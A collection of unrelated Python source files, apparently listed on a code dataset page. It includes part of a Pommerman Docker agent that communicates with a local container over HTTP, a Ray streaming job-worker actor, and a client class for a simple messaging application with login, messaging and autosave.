max_backoff = min(timeout, 16)
if timeout:
# time module is needed to calc timeout shared between two exceptions
end = time.time() + timeout
while True:
try:
now = time.time()
if timeout and end < now:
print("Timed out - %s:%s" % (self._server, self._port))
raise
request_url = '%s:%s/ping' % (self._server, self._port)
req = requests.get(request_url)
self._acknowledged = True
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except docker.errors.APIError as e:
print("This is a Docker error. Please fix: ", e)
raise
def init_agent(self, id, game_type):
super(DockerAgent, self).init_agent(id, game_type)
request_url = "http://localhost:{}/init_agent".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"id": json.dumps(id, cls=utility.PommermanJSONEncoder),
"game_type": json.dumps(game_type, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in init_agent()!')
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.15,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
num_actions = len(action_space.shape)
if num_actions > 1:
return [0] * num_actions
else:
return 0
return action
def episode_end(self, reward):
request_url = "http://localhost:{}/episode_end".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"reward": json.dumps(reward, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in episode_end()!')
def shutdown(self):
request_url = "http://localhost:{}/shutdown".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={ })
except requests.exceptions.Timeout as e:
print('Timeout in shutdown()!')
print("Stopping container..")
if self._container:
try:
return self._container.remove(force=True)
except docker.errors.NotFound as e:
return True
|
jobworker.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import pickle
import threading
import ray
import ray.streaming._streaming as _streaming
from ray.streaming.config import Config
from ray.function_manager import FunctionDescriptor
from ray.streaming.communication import DataInput, DataOutput
logger = logging.getLogger(__name__)
@ray.remote
class JobWorker:
"""A streaming job worker.
Attributes:
worker_id: The id of the instance.
input_channels: The input gate that manages input channels of
the instance (see: DataInput in communication.py).
output_channels (DataOutput): The output gate that manages output
channels of the instance (see: DataOutput in communication.py).
the operator instance.
"""
def __init__(self, worker_id, operator, input_channels, output_channels):
self.env = None
self.worker_id = worker_id
self.operator = operator
processor_name = operator.processor_class.__name__
processor_instance = operator.processor_class(operator)
self.processor_name = processor_name
self.processor_instance = processor_instance
self.input_channels = input_channels
self.output_channels = output_channels
self.input_gate = None
self.output_gate = None
self.reader_client = None
self.writer_client = None
def init(self, env):
"""init streaming actor"""
env = pickle.loads(env)
self.env = env
logger.info("init operator instance %s", self.processor_name)
if env.config.channel_type == Config.NATIVE_CHANNEL:
core_worker = ray.worker.global_worker.core_worker
reader_async_func = FunctionDescriptor(
__name__, self.on_reader_message.__name__,
self.__class__.__name__)
reader_sync_func = FunctionDescriptor(
__name__, self.on_reader_message_sync.__name__,
self.__class__.__name__)
self.reader_client = _streaming.ReaderClient(
core_worker, reader_async_func, reader_sync_func)
writer_async_func = FunctionDescriptor(
__name__, self.on_writer_message.__name__,
self.__class__.__name__)
writer_sync_func = FunctionDescriptor(
__name__, self.on_writer_message_sync.__name__,
self.__class__.__name__)
self.writer_client = _streaming.WriterClient(
core_worker, writer_async_func, writer_sync_func)
if len(self.input_channels) > 0:
self.input_gate = DataInput(env, self.input_channels)
self.input_gate.init()
if len(self.output_channels) > 0:
self.output_gate = DataOutput(
env, self.output_channels,
self.operator.partitioning_strategies)
self.output_gate.init()
logger.info("init operator instance %s succeed", self.processor_name)
return True
# Starts the actor
def start(self):
self.t = threading.Thread(target=self.run, daemon=True)
self.t.start()
actor_id = ray.worker.global_worker.actor_id
logger.info("%s %s started, actor id %s", self.__class__.__name__,
self.processor_name, actor_id)
def run(self):
logger.info("%s start running", self.processor_name)
self.processor_instance.run(self.input_gate, self.output_gate)
logger.info("%s finished running", self.processor_name)
self.close()
def close(self):
if self.input_gate:
self.input_gate.close()
if self.output_gate:
self.output_gate.close()
def is_finished(self):
return not self.t.is_alive()
def on_reader_message(self, buffer: bytes):
"""used in direct call mode"""
self.reader_client.on_reader_message(buffer)
def on_reader_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.reader_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.reader_client.on_reader_message_sync(buffer)
return result.to_pybytes()
def on_writer_message(self, buffer: bytes):
"""used in direct call mode"""
self.writer_client.on_writer_message(buffer)
def on_writer_message_sync(self, buffer: bytes):
"""used in direct call mode"""
if self.writer_client is None:
return b" " * 4 # special flag to indicate this actor not ready
result = self.writer_client.on_writer_message_sync(buffer)
return result.to_pybytes()
|
ClientNode.py
|
from utils.StorageUtility import StorageUtility
from ClientDatabase import ClientDatabase
from ServerConnection import ServerConnection
from data_classes.Message import Message
from data_classes.PublicInfo import PublicInfo
from data_classes.UserInfo import UserInfo
from threading import Thread, Event
class ClientNode:
def __init__(self, host_address: str, username: str, password: str):
"""Initializes the data fields for the ClientNode object and sets
the username and password fields"""
self.__host_address = host_address
self.__username = username
self.__password = password
self.__database: ClientDatabase = None
self.__server_connection: ServerConnection = None
self.__on_new_messages_received = lambda messages: None
self.__on_new_server_public_info = lambda public_info: None
self.__storage_utility = StorageUtility(f'{username}_client_database.txt')
self.__is_online = False
self.__autorefresh_on = False
def login(self):
"""Sets up the ClientNode by attempting to load from an existing saved database
or attempting to restore user information from the server. Assumes that there is an
account on the server corresponding to this user. Raises an exception if the login fails"""
# create a ServerConnection object
if self.__server_connection is None:
self.__server_connection = ServerConnection(self.__host_address, self.__username, self.__password)
# attempt to log in the user
response = self.__server_connection.login_user()
if response != 'success':
return False
# set the online flag
self.__is_online = True
# attempt to load from a save file. If unsuccessful, restore from server:
db = self.__storage_utility.load()
if db is not None:
self.__database = db
else:
self.__database = ClientDatabase(self.__username, self.__password)
self.restore_user_info()
self.__storage_utility.save(self.__database)
# begin autosaving the database at the file path every 5 minutes
self.__storage_utility.start_autosave(self.__database, timespan=300)
# begin refreshing every 5 seconds
self.start_autorefresh(timeout=5)
return True
def register_user(self):
"""Registers a new account for this user with the server and sets up a database to store
this user's info on the local computer. Returns True if successful and False otherwise"""
# create a ServerConnection object
self.__server_connection = ServerConnection(self.__host_address, self.__username, self.__password)
# register this user to the server
response = self.__server_connection.register_new_user()
if response != 'success':
return False
else:
return True
def logout(self):
"""Logs the user out by changing their status to offline in the server and sets the is_online flag
to false"""
# change public info to offline
public_info = PublicInfo(status_tag=PublicInfo.OFFLINE)
self.set_user_public_info(public_info)
# change online flag to false
self.__is_online = False
# stop autosaving
self.__storage_utility.stop_autosave()
self.__storage_utility.save(self.__database)
# stop autorefreshing()
self.stop_autorefresh()
return True
def set_on_new_messages_received(self, target):
"""sets the specified target function to be performed on a list of new messages whenever
new messages are received. The target function should accept a list of Message objects as an argument"""
if self.__is_online:
raise ClientNodeException('This change cannot be made while the node is online')
self.__on_new_messages_received = target
def set_on_new_server_public_info(self, target):
"""sets the specified target function to be performed on a dictionary of public_info whenever
new server public information is received. The target function should accept a dictionary of PublicInfo
objects keyed by username"""
if self.__is_online:
raise ClientNodeException('This change cannot be made while the node is online')
self.__on_new_server_public_info = target
def get_inbox(self):
"""Returns the user's inbox"""
self.__assert_online()
return self.__database.get_inbox()
def get_outbox(self):
"""Returns the user's outbox"""
self.__assert_online()
return self.__database.get_outbox()
def send_message(self, m: Message):
"""Sends the message to the server and updates the user's database with the message.
returns True if successful and false otherwise"""
self.__assert_online()
response = self.__server_connection.send_message(m)
if not response == 'success':
print(response)
return False
try:
self.__database.add_message(m)
except ValueError:
return False
return True
def delete_message(self, m: Message):
"""Deletes the specified message from the client database"""
self.__assert_online()
self.__database.delete_message(m)
return True
def get_user_public_info(self):
"""Returns the public info object for this user"""
return self.__database.get_public_info()
def set_user_public_info(self, p: PublicInfo):
"""Sends the public_info object to the server and updates the user's database
with the public_info object. Returns true if successful and False otherwise"""
self.__assert_online()
response = self.__server_connection.update_public_info(p)
if not response == 'success':
return False
try:
self.__database.set_public_info(p)
except ValueError:
return False
return True
def get_server_public_info(self):
"""Gets the server public info from the database and returns it."""
self.__assert_online()
return self.__database.get_server_public_info()
def get_user_list(self):
"""Returns a list of usernames registered on the server"""
self.__assert_online()
return list(self.get_server_public_info().keys())
def start_autorefresh(self, timeout: int = 30):
"""Begins automatically refreshing the connection with the server at the interval
of time specified by timeout (seconds)"""
self.__assert_online()
self.__autorefresh_on = True
Thread(target=self.__autorefresh_loop, args=(timeout,), daemon=True).start()
def stop_autorefresh(self):
"""Stops the autorefresh cycle"""
self.__autorefresh_on = False
def refresh(self):
"""Refreshes the client node by requesting new messages and new server public info from
the server. If any is received, it handles it updating the database and calling the
on_new_messages_received and on_new_public_server_info functions"""
self.__assert_online()
# get new messages
messages = self.__server_connection.get_new_messages()
# if there are any new messages, add them to database and process them
if len(messages) > 0:
self.get_inbox().extend(messages)
self.__on_new_messages_received(messages)
# get new server public info
server_public_info = self.__server_connection.get_server_public_info()
# if server public info is not None, update the database and process the changes
if server_public_info is not None:
self.__database.set_server_public_info(server_public_info)
self.__on_new_server_public_info(server_public_info)
def __autorefresh_loop(self, timeout: int):
"""Refreshes the client node at the interval of time specified by the paramenter timeout (seconds)"""
while self.__autorefresh_on:
self.refresh()
Event().wait(timeout)
def restore_user_info(self):
"""Obtains the server's UserInfo object for this user and overwrites the database with this object.
Effectively restores any messages that may have been deleted from the inbox or outbox of the user
returns true if successful and false otherwise"""
self.__assert_online()
# get the userinfo object and save it to the database
user_info = self.__server_connection.get_user_info()
try:
assert type(user_info) == UserInfo
except AssertionError:
return False
self.__database.set_user_info(user_info)
# get the server public info and save it to the database
self.__server_connection.update_public_info(self.get_user_public_info())
public_info = self.__server_connection.get_server_public_info()
try:
assert type(public_info) == dict
except AssertionError:
return False
self.__database.set_server_public_info(public_info)
return True
def __assert_online(self):
if not self.__is_online:
raise ClientNodeException(f'Client node for user {self.__username} is offline')
class ClientNodeException(BaseException):
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.